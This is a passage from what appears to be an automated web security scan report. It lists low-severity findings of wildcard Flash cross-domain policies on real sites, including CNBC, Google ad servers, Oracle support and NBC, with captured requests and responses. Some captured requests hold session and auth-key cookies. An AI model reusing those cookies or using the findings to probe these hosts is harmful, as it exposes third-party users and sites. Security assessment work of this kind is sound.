Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

4.100. http://pagead2.googlesyndication.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Tue, 06 Sep 2011 00:01:39 GMT
Expires: Wed, 07 Sep 2011 00:01:39 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 53954
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.101. http://pi.pardot.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pi.pardot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pi.pardot.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:03 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 16:22:18 GMT
ETag: "e5"
Accept-Ranges: bytes
Content-Length: 229
Cache-Control: max-age=63072000
Expires: Thu, 05 Sep 2013 15:32:03 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/xml
X-Pardot-LB: lb-d2
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pardot.com" />
<allow-access-from domain="*.visual.force.com" />
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...

4.102. http://quote.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://quote.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: quote.cnbc.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 06 Sep 2011 14:56:38 GMT
Via: 1.1 C aicache6
Content-Length: 245
X-Aicache-OS: 64.210.195.136:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Wed, 07 Sep 2011 14:56:39 GMT

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.103. http://rd.rlcdn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rd.rlcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.rlcdn.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 500
Last-Modified: Mon, 05 Sep 2011 19:31:28 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.casualcollective.com" />
<allow-access-from domain="*.tubemogul.com" />
<allow-access-from domain="*.inplay.tubemogul.com" />
<allow-access-from domain="*.grooveshark.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adotube.com" />
...[SNIP]...

4.104. http://search.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:01 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Mon, 18 Oct 2010 20:53:56 GMT
ETag: "f5-492ea5fe9c100"
Accept-Ranges: bytes
Content-Type: application/xml
Via: 1.1 aicache6
Content-Length: 245
X-Aicache-OS: 64.210.194.246:80
Connection: Keep-Alive
Keep-Alive: max=20

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.105. http://server.iad.liveperson.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: server.iad.liveperson.net

Response

HTTP/1.1 200 OK
Content-Length: 526
Content-Type: text/xml
Content-Location: http://server.iad.liveperson.net/crossdomain.xml
Last-Modified: Thu, 23 Oct 2008 22:13:48 GMT
Accept-Ranges: bytes
ETag: "076249f5c35c91:100b"
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"
...[SNIP]...
<allow-access-from domain="*.neogames-tech.com" secure="false" />
...[SNIP]...
<allow-access-from domain="secure.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.qa.neogames-tech.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="secure.st.neogames-tech.com" secure="false"/>
...[SNIP]...

4.106. http://snas.nbcuni.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: snas.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
Last-Modified: Fri, 17 Dec 2010 18:25:22 GMT
ETag: "2c9cd-58b-4979f4b136880"
Accept-Ranges: bytes
Content-Length: 1419
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:00:39 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*.ivillage.com" /><allow-access-from domain="*.nbbcdev.com" /><allow-access-from domain="*.bravotv.com" /><allow-access-from domain="*.console.net" /><allow-access-from domain="*.digphilly.com"/><allow-access-from domain="*.nbc10rss.com"/><allow-access-from domain="*.nbc10.com"/><allow-access-from domain="*.scifi.com"/><allow-access-from domain="*.weatherplus.com" /><allow-access-from domain="*.nbcuxd.com" /><allow-access-from domain="vplayer-preview-dev.nbcuni.ge.com" /><allow-access-from domain="*.industrynext.com"/><allow-access-from domain="*.nbcuni.com"/><allow-access-from domain="widgets.nbcuni.com"/><allow-access-from domain="*.nbc.com"/><allow-access-from domain="*.thetonightshowwithconan.com"/><allow-access-from domain="*.tonightshowwithconanobrien.com"/><allow-access-from domain="*.thetonightshowwithconanobrien.com"/><allow-access-from domain="*.tonightshow.com" /><allow-access-from domain="*.tonightshowwithconan.com" /><allow-access-from domain="*.latenightwithjimmyfallon.com" /><allow-access-from domain="*.ingaylewetrust.com" /><allow-access-from domain="*.thejaylenoshow.com" /><allow-access-from domain="127.0.0.1"/><allow-access-from domain="localhost"/><allow-access-from domain="*.sudjam.com"/>
...[SNIP]...

4.107. https://support.oracle.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: support.oracle.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:11:15 GMT
Server: Oracle-Application-Server-11g
Last-Modified: Sat, 13 Aug 2011 04:17:35 GMT
ETag: "1827ecc-f6-4aa5b4f3d35c0"
Accept-Ranges: bytes
Content-Length: 246
Vary: Accept-Encoding
Cache-Control: no-store,max-age=0,must-revalidate
Keep-Alive: timeout=15, max=1799
Connection: close
Content-Type: application/xml
Content-Language: en

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.oracle.com" secure="true" />
<allow-http-request-headers-from domain="*.oracle.com" secure="true" headers="ORA_MOS_LOC
...[SNIP]...

4.108. http://symlookup.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://symlookup.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: symlookup.cnbc.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339024957; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.27
Content-Type: application/xml
Content-Length: 299
X-Aicache-OS: 64.210.193.218:80
Expires: Tue, 06 Sep 2011 15:02:33 GMT
Date: Tue, 06 Sep 2011 14:57:09 GMT
Connection: close

<?xml version="1.0"?>
<!-- http://stage.ticker.cnbc.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
...[SNIP]...

4.109. http://videometa.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://videometa.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: videometa.cnbc.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.27
Content-Type: application/xml
Content-Length: 462
X-Aicache-OS: 64.210.193.215:80
Cache-Control: max-age=600
Expires: Tue, 06 Sep 2011 15:06:36 GMT
Date: Tue, 06 Sep 2011 14:56:36 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="www.cnbc.com" />
<allow-access-from domain="*.cnbc.com" />
<allow-access-from domain="www.msn.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="video.nbcuni.com" />
<allow-access-from domain="*.video.nbcuni.com" />
<allow-access-from domain="widgets.nbcuni.com" />
<allow-access-from domain="*.widgets.nbcuni.com" />
...[SNIP]...

4.110. http://w.sharethis.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://w.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: w.sharethis.com

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Accept-Ranges: bytes
Date: Tue, 06 Sep 2011 16:46:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.111. http://wd.sharethis.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: wd.sharethis.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 15:32:10 GMT
Content-Type: text/xml
Content-Length: 330
Last-Modified: Mon, 29 Aug 2011 16:55:44 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*.meandmybadself.com" />
<allow-access-from domain="*.sharethis.com" />
...[SNIP]...

4.112. http://www.apture.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apture.com

Response

HTTP/1.0 200 OK
Last-Modified: Sat, 03 Sep 2011 01:16:29 GMT
Content-Length: 366
Content-Type: text/xml
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:33:01 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.apture.com" />
<allow-access-from domain="*.sharlinx.com" />
<allow-access-from domain="apture.com" />
<allow-access-from domain="sharlinx.com" />
...[SNIP]...

4.113. http://www.atg.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.atg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.atg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 19 Jul 2010 15:33:33 GMT
ETag: "6009a-128-48bbf4a92ed40"
Pragma: no-cache
Content-Type: text/xml
Cache-Control: private, no-cache, no-store, no-transform, proxy-revalidate
Date: Tue, 06 Sep 2011 15:32:21 GMT
Content-Length: 296
Connection: close

<?xml version="1.0" ?>
<!-- http://www.atg.com/crossdomain.xml -->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.atg.com"/>
<
...[SNIP]...

4.114. https://www.atg.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.atg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.atg.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 19 Jul 2010 15:33:33 GMT
ETag: "6009a-128-48bbf4a92ed40"
Pragma: no-cache
Content-Type: text/xml
Cache-Control: private, no-cache, no-store, no-transform, proxy-revalidate
Date: Tue, 06 Sep 2011 15:37:32 GMT
Content-Length: 296
Connection: close

<?xml version="1.0" ?>
<!-- http://www.atg.com/crossdomain.xml -->
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*.atg.com"/>
<
...[SNIP]...

4.115. http://www.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://media.cnbc.com/i/CNBC/Components/Promos/_app/promoBox_noBevelAuto.swf?delay=0&config=24596694&v=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; xaikeeperua=yes; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; s_cc=true; s_sq=%5B%5BB%5D%5D; adops_master_kvs=; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:55 GMT
Via: 1.1 C aicache6
Content-Length: 3839
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:55 GMT

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
...[SNIP]...
<allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.116. http://www.csc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.csc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

